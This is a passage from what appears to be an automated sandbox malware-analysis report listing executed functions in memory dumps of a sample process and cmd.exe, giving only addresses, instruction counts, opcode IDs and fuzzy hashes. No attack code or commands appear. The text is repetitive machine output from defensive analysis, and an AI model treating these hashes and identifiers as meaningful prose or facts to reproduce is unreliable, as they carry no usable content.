Instruction Fuzzy Hash: 4DF01230A15A4E9FDB90EF64C8496FE77E0FF14304F414566E81CD3160DA70A6A0CB80

Function 00007FFD9BAB0B18 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2171382829.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9bab0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c67b13be7031169c95447e3db2b68f933cec88b708c56ba3f045af298eed6355
Instruction ID: f270bbc254d536b87dfdfccf062520ab6ea6c829604a3438fbe826ddacdc1779
Opcode Fuzzy Hash: c67b13be7031169c95447e3db2b68f933cec88b708c56ba3f045af298eed6355
Instruction Fuzzy Hash: ACF0A534908A4EDFDBA4EF58D955BAA77A0FF58304F010165E81DC3264DB74EAA4CB81

Function 00007FFD9BAB815F Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000022.00000002.2171382829.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_7ffd9bab0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8faaf073bebea553ac5aaa321036d3ef79aa0cd5f065bd05655d15a82349f9a0
Instruction ID: 875ee57be3e222a5d0be2d9fbb91ade3cfc6bbd96ebf37fa3dc04f70209384f8
Opcode Fuzzy Hash: 8faaf073bebea553ac5aaa321036d3ef79aa0cd5f065bd05655d15a82349f9a0
Instruction Fuzzy Hash: 9DE0B630B1661D4FE768DB48D8A0AE972A1AB44354F1043F5A01D9659ACA742E858E80

Analysis Process: ruRRsbcJNKBbiFjvLZZICNpuYz.exePID: 3868, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9BAA0DA8 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90e6770af83e0dc7ff7b39f549ae14a4006bc809939cdf2547aa8dfde4808da7
Instruction ID: 7993d135cfa4dffdab0eff0ed40e5ce1e833b4f1a40880d3875d35750c7220f8
Opcode Fuzzy Hash: 90e6770af83e0dc7ff7b39f549ae14a4006bc809939cdf2547aa8dfde4808da7
Instruction Fuzzy Hash: 22A1B271A1998D8FE7A8DB68C8657A97FE1FF99314F4001BAD04DD72E6CBB82801C750

Function 00007FFD9BAA08D0 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0de7418528077e811411b9a91b78ebc0c9729c3961b00cfb3d7d1ddcad9debc7
Instruction ID: 60ba4d9edba1866795d0470626a0f968bfb91847372268e0e82c88ec85f6eac7
Opcode Fuzzy Hash: 0de7418528077e811411b9a91b78ebc0c9729c3961b00cfb3d7d1ddcad9debc7
Instruction Fuzzy Hash: 3B51C531A0855D8FDB54FFA8E4A5AED7BA0FF5832AF04017BD40DD7196CB246441CB90

Function 00007FFD9BAA0908 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0cde2a7ebee7683eff39e69ddf21aec50e6f47c2f64296e2be2928b7fdb2596
Instruction ID: e3da51986f84b911de53576e359fb71f578db2aa895faf6fcf41240310cd59ba
Opcode Fuzzy Hash: c0cde2a7ebee7683eff39e69ddf21aec50e6f47c2f64296e2be2928b7fdb2596
Instruction Fuzzy Hash: 16517930A0491E9FCF84EF98D484EEDBBF1FF58314B060169E419E7260DA70E9908B80

Function 00007FFD9BAA0998 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f3fbf9de75172d4068c51a4db26fb5a96cfd1cc34a3895c0a5e92e77e330fd8
Instruction ID: f7e84c01a6e76a5ad439347168c1c4118bede0c2649aa671b452f3c050f338ac
Opcode Fuzzy Hash: 1f3fbf9de75172d4068c51a4db26fb5a96cfd1cc34a3895c0a5e92e77e330fd8
Instruction Fuzzy Hash: 44412970E1491D8FDF94EF98C895AEDBBB1FF58315F00016AE419E32A5DB34A941CB90

Function 00007FFD9BAA50F4 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b645f9cfbbca40d8d87c7cff7159072c5d7eef902e9a9902ec0c5cfa8f4c511
Instruction ID: 62bbd50300f80038a6a9e4a03e7d50fcbfe2f660a4ee87634fe13dd3788fcbea
Opcode Fuzzy Hash: 8b645f9cfbbca40d8d87c7cff7159072c5d7eef902e9a9902ec0c5cfa8f4c511
Instruction Fuzzy Hash: CB31A87491891C8FDBA8EB14C865AE9B7B1FB68309F1001EA900EE3295CB756B80CF45

Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b93dd164c2dbefe6905149a39532f5dbc91d44e90b71451654e25dfffa6e1a28
Instruction ID: e6a9251eb52b941889bd21736a239aa1913856fbfbfdf06170e685b30370e30f
Opcode Fuzzy Hash: b93dd164c2dbefe6905149a39532f5dbc91d44e90b71451654e25dfffa6e1a28
Instruction Fuzzy Hash: 5F214C36B0E28D4FE7329BA8DC202ED7761EF82721F064573C158DB1E2D674260AC765

Function 00007FFD9BAA119D Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a365466e27ba171a7ff94088dc8ae0b09f5a745e3b45a2bff9a47c28d6efbeac
Instruction ID: fcba7bebbd83afb0d92c4d5d6f9a8e9a4f30e8de382b72aeca6ba0238731adb4
Opcode Fuzzy Hash: a365466e27ba171a7ff94088dc8ae0b09f5a745e3b45a2bff9a47c28d6efbeac
Instruction Fuzzy Hash: 07213C31A1490E8FEB94EFA8C8949BDB7F2FF68300B11457AD409D32A1DF74A941CB50

Function 00007FFD9BAA90A2 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91bd3921551483cd655ca2b4b198229cd401cb10984c881e1722edca47d1f14e
Instruction ID: c86f2940e1b8f2b7331621f6fbb172b9afabb134a2f3907bc2ba8d3975fdb0ae
Opcode Fuzzy Hash: 91bd3921551483cd655ca2b4b198229cd401cb10984c881e1722edca47d1f14e
Instruction Fuzzy Hash: 7121DA70E1952E8EEBB4EF54C8647ECB6B2AF54346F4541FA900DE62A1DB746A80CF10

Function 00007FFD9BAA9014 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e3903b0f730399cae3fd2e0a0d95d8d5388040fddadefd202e2bd77951ccaa
Instruction ID: 9b7491569bc6b8888ad5ab98a43c0198618ca43b38b5b165cc4b66108f161646
Opcode Fuzzy Hash: 18e3903b0f730399cae3fd2e0a0d95d8d5388040fddadefd202e2bd77951ccaa
Instruction Fuzzy Hash: FB21B870D1952D8EEBB8EB54C8A4BEDB6B1AB54315F5045FAC00DA2291DFB46AC4CF00

Function 00007FFD9BAA0C38 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be517822f7516616a002b8be9137227506bf92e28c25870c0640ec98bfc78461
Instruction ID: b6e21ffd9ac7ee8bfccb47575cab4dfa8e768f4a7d69d93759e8537b59a0aee9
Opcode Fuzzy Hash: be517822f7516616a002b8be9137227506bf92e28c25870c0640ec98bfc78461
Instruction Fuzzy Hash: 56112B36B0E68E4FE7229FA4C8602E97771EF82711F054573D058DB1E2DA78260AC764

Function 00007FFD9BAA8E94 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcefde5ee9961e2098808cbef9b4610f8c681121919a8a09c43b40318d189d22
Instruction ID: 32131a1cdb692177af4e1357bf5fbf8bb6cc4966cd3b23b7ae6827b7608d5f91
Opcode Fuzzy Hash: bcefde5ee9961e2098808cbef9b4610f8c681121919a8a09c43b40318d189d22
Instruction Fuzzy Hash: 88215170E1E55E8EEBB4DB54C8647FCB6B2AB44355F5141BAC00DA22A1DFB86B80CF10

Function 00007FFD9BAA0C40 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fd3bf83f84bc3a1ad2f07396d1e2a9434a5933ebfb808504bd34267a7ccafb2
Instruction ID: 1122c09b0cbf6d4f1019ff0e4b8badeab90cafbc10df94da8f7b2c5240815978
Opcode Fuzzy Hash: 6fd3bf83f84bc3a1ad2f07396d1e2a9434a5933ebfb808504bd34267a7ccafb2
Instruction Fuzzy Hash: EC115932A0E28E4FE7229FA4C8602EA7771EF42711F054573D058DB1E2CA782609CB64

Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40d50f650372a8140607874d421f31ad4bad78fda63d8d1b34993076fd1eca12
Instruction ID: 70d69f662bdd3d2c341f2479a6311c7f588415e76534d839aef380ee2dafe25a
Opcode Fuzzy Hash: 40d50f650372a8140607874d421f31ad4bad78fda63d8d1b34993076fd1eca12
Instruction Fuzzy Hash: 4F01D271E0E28E8FE7229FA4C8602EAB771EF02711F0545B3D459DB1E2CA782615CB65

Function 00007FFD9BAAB3A2 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5537c81e21c29ab5100b3fd733abac75941d878031bc1a667f5f864665178be3
Instruction ID: ed02b4364fb061a3eec4a2423a99a10c6bf85866cdf6e0840984910d69f69950
Opcode Fuzzy Hash: 5537c81e21c29ab5100b3fd733abac75941d878031bc1a667f5f864665178be3
Instruction Fuzzy Hash: 15211A70E0662D8EEBB0EB14C8547ECB3B2EB95311F1041E9C00DA22A1DBB95AD5CF15

Function 00007FFD9BAA8ED2 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d3908c6a8591edd985ba8eb1238f4e1f4ac7b3b4cd93431749f504880a843be
Instruction ID: 4a5519970e0f966f275d5fd54d0df239a2b60970423a9c7dff05f2f7c30bc2cc
Opcode Fuzzy Hash: 2d3908c6a8591edd985ba8eb1238f4e1f4ac7b3b4cd93431749f504880a843be
Instruction Fuzzy Hash: F811FE70D1956D8EEB78DB54C8647ECB6B1AB54705F4141FAD00DA22A1DBB86BC4CF10

Function 00007FFD9BAA0B95 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb3bfdb9603e476f4b784719e8afe7ab9ae8ddd08254159606d5cde04c29c39f
Instruction ID: ba4af4fb010710f014128e6cf8699827a404a890d665f42b733f729284f6a4ca
Opcode Fuzzy Hash: cb3bfdb9603e476f4b784719e8afe7ab9ae8ddd08254159606d5cde04c29c39f
Instruction Fuzzy Hash: DD011634A2864DCFCB44EF58C895AE97BE0FB18304F00026AE85ED3250C770EA61CF81

Function 00007FFD9BAA06A5 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92729382008f01731ed0f3a022329951a15473e739d85a2b7bbb80f74b8879ef
Instruction ID: 8e071c47a73b589626a11ed47b4ae5de0543cb083a9f89e1f42bad84c56b20bc
Opcode Fuzzy Hash: 92729382008f01731ed0f3a022329951a15473e739d85a2b7bbb80f74b8879ef
Instruction Fuzzy Hash: 0AF09030A15A4E9FEB60EF58C8486EE77A1FF64704F010036E41CC21A0DAB062908B80

Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51e55b1649dd0dcec18c850f60dac779f09d5e67d42e0ba577eeb9683bad4686
Instruction ID: e671d6f21ad19e038b6d7663604e1cf21b6b8665a854fcf24f45d7e1f7b8d5ca
Opcode Fuzzy Hash: 51e55b1649dd0dcec18c850f60dac779f09d5e67d42e0ba577eeb9683bad4686
Instruction Fuzzy Hash: 29F03730D1594E9FDB90EF64C8496FE77E0FF14304F41457AE81CD2160DA70A6A4CB81

Function 00007FFD9BAA0B18 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2f37d5209a9a46d317268102b8557fe7a93e56b6dc06fc6cf90defc352cb084
Instruction ID: c05a9a199f2ce457a28dd785a4e3097cc7fe2d10e41318c2f74d98efe876596f
Opcode Fuzzy Hash: a2f37d5209a9a46d317268102b8557fe7a93e56b6dc06fc6cf90defc352cb084
Instruction Fuzzy Hash: 60F01C3050490DCFCF90EF58C844BAA77A0FF18304F000165E41DC3164D774E964CB81

Function 00007FFD9BAA815F Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2171310339.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9baa0000_ruRRsbcJNKBbiFjvLZZICNpuYz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bc766052ace556b5492558d8cc5aa019d0e53bb23b4a978bb5e99d071c70882
Instruction ID: f6707aa045f79cccfab16c439013b975b568eea9e5eaddd8d0466c14b99c161b
Opcode Fuzzy Hash: 4bc766052ace556b5492558d8cc5aa019d0e53bb23b4a978bb5e99d071c70882
Instruction Fuzzy Hash: A5E0EC30F066194FE768DB48DCB0AE972B1BF44394F5042F5E00D965DACAB42E858F80

Analysis Process: cmd.exePID: 7808, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9BA90DA8 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2204526269.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9ba90000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8169b9848d87a2d2de119cb8bed216a8b1a45b656d2dce8e20c6ed693a5ba7e0
Instruction ID: f942ab395f90d62ef68186a9ae0d138de4ba069b8345d10e6b038b3341372818
Opcode Fuzzy Hash: 8169b9848d87a2d2de119cb8bed216a8b1a45b656d2dce8e20c6ed693a5ba7e0
Instruction Fuzzy Hash: 96A1C1B1A1994D8FE798DF68C8657A97BF1FF59354F0001BEE049D72EADB7828018B40

Function 00007FFD9BA908D0 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2204526269.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9ba90000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6aed092eb35815b2f397301840418dee14673f26334c07f1a68e164130df404
Instruction ID: 5997813371b80c174018b4bb1dc824cbfcca807d3f2861b7472b02d6625542b1
Opcode Fuzzy Hash: a6aed092eb35815b2f397301840418dee14673f26334c07f1a68e164130df404
Instruction Fuzzy Hash: F151B331A0855D8FDB54EFA8D8A5AED77B1FF58329F0401BBE44DDB196CB246441C780

Function 00007FFD9BA90998 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2204526269.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9ba90000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72214a1ac6c7a6588eecfd4116dfcfa5a3214a84b961eb7ef3de538fe8702cdb
Instruction ID: 8671e80027ee10caa2f29abc6f3b6d7d235d3151e207a44edaf5260cbd24925e
Opcode Fuzzy Hash: 72214a1ac6c7a6588eecfd4116dfcfa5a3214a84b961eb7ef3de538fe8702cdb
Instruction Fuzzy Hash: DB513970E1991D9FEB94EFA8C895AED7BF1FF68305F00016AE409E32A5DB346950CB50

Function 00007FFD9BA90908 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2204526269.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9ba90000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2a3c2110590c724f7a5a37f80cadbe5dba4793df8dc191cd82704fc04d8f0a
Instruction ID: 23ed2d58ccb8745bbf372e652bd55d0ab82ed4eb06e12cd11b300a57106a76d6
Opcode Fuzzy Hash: ee2a3c2110590c724f7a5a37f80cadbe5dba4793df8dc191cd82704fc04d8f0a
Instruction Fuzzy Hash: 47519C30A0490E9FCF94EF98D494EEEBBF1FF58314B050169E419E7260DA70E990CB90

Function 00007FFD9BA950F4 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2204526269.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9ba90000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950022108eff63880f062a3d249e73fb4462965ece9d854c8378f47cb4e94a4b
Instruction ID: 57aac7c56c684751c14079682b4d61d77861806d40a11cb0bf616379a51bba4f
Opcode Fuzzy Hash: 950022108eff63880f062a3d249e73fb4462965ece9d854c8378f47cb4e94a4b
Instruction Fuzzy Hash: 9731A775918A1C8EDBA4EF14C865AE9B7B0FB68309F1001EA900EE3295CB755B80CF41

Function 00007FFD9BA90C25 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2204526269.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9ba90000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26a9f6a499025d63f4f16a7a8846fda47a2be0caf84d8503f75aef24e295d4e3
Instruction ID: 12b3c8047f630fd63cfdbfbdcfe766a0df4283643a171b464f53d76b88fd23fe
Opcode Fuzzy Hash: 26a9f6a499025d63f4f16a7a8846fda47a2be0caf84d8503f75aef24e295d4e3
Instruction Fuzzy Hash: D9213736B0E28E4FE7229BA8DC201E97770DF42761F064673D464DB1E2D674260AC755

Function 00007FFD9BA9119D Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2204526269.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9ba90000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a183e4c6f9cd17799d5ea64b00b77ddead685ef6ae383a639e3c16b5e89a24a
Instruction ID: 5364995ecfee01d2599c110a72b88fcd05396f63887f94df1fb5e0740c9f1c1c
Opcode Fuzzy Hash: 3a183e4c6f9cd17799d5ea64b00b77ddead685ef6ae383a639e3c16b5e89a24a
Instruction Fuzzy Hash: CD213C31A1591E9FEB94EFA8C8949EDB7F1FF28300B11467AD409D32A1DF74A941CB40

Function 00007FFD9BA990A2 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2204526269.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9ba90000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05737a1ba77eea4bb9fa53cff37d376b5667f0ec2a783578e0c1a59aa4e70f84
Instruction ID: 415360c3b7a332edc732557d4d58ef25a5feb8b56922d336a6a20de4248455f4
Opcode Fuzzy Hash: 05737a1ba77eea4bb9fa53cff37d376b5667f0ec2a783578e0c1a59aa4e70f84
Instruction Fuzzy Hash: DB21D870E1992D8EEBA4EF54C8647E8B6B1AF54385F0141FA900DE62A1DBB45A80DF00

Function 00007FFD9BA99014 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2204526269.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9ba90000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf85fab213b9c426c362485d5d8a40f519600538372940bc80dd72f91d37a3bc
Instruction ID: d6e2dcb90f1c88448f0f85bca775c5b1b5f86856f4c05380d533dd267eb7b315
Opcode Fuzzy Hash: cf85fab213b9c426c362485d5d8a40f519600538372940bc80dd72f91d37a3bc
Instruction Fuzzy Hash: 1221B931D1952D8EEBA4EB54C8A4BEDB6B1EB54355F1045FAC00DA2291DFB46BC4DF00

Function 00007FFD9BA90C38 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2204526269.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9ba90000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3fbae25585cf71f9a25867046bb0c38bfc21b1a354aae59e4883ca679e2d308
Instruction ID: 67075aef85a41d9842431b19110eca31eeff479340a32aebfefa9dd61a59c3a9
Opcode Fuzzy Hash: f3fbae25585cf71f9a25867046bb0c38bfc21b1a354aae59e4883ca679e2d308
Instruction Fuzzy Hash: 48113D32B0E28E4FF7229BA4CC601EA7770EF42751F064573D464EB1E2DA782606C754

Function 00007FFD9BA98E94 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2204526269.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9ba90000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21a4329b412fa68c78f9f1ebcc4fc202ad883ab6196c7de018a12c2192e8eb7c
Instruction ID: f3883d94fdd69443117e53f27391346cff26ebf062dff91c2f8720bc1f551587
Opcode Fuzzy Hash: 21a4329b412fa68c78f9f1ebcc4fc202ad883ab6196c7de018a12c2192e8eb7c
Instruction Fuzzy Hash: 45215E31E1E55D8EEBB4DB54C8647FC72B1AB44395F1141BAC00DA22A1DFB86B84EF00

Function 00007FFD9BA90C40 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2204526269.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ffd9ba90000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 541ca1e9a5dd297f1fb3068cbf6a58a17012fdca5b19ea04451500cef20274b2
Instruction ID: f232780647865583d3faf165674312046d123395abfe33e473f7cadd8af27a06
Opcode Fuzzy Hash: 541ca1e9a5dd297f1fb3068cbf6a58a17012fdca5b19ea04451500cef20274b2
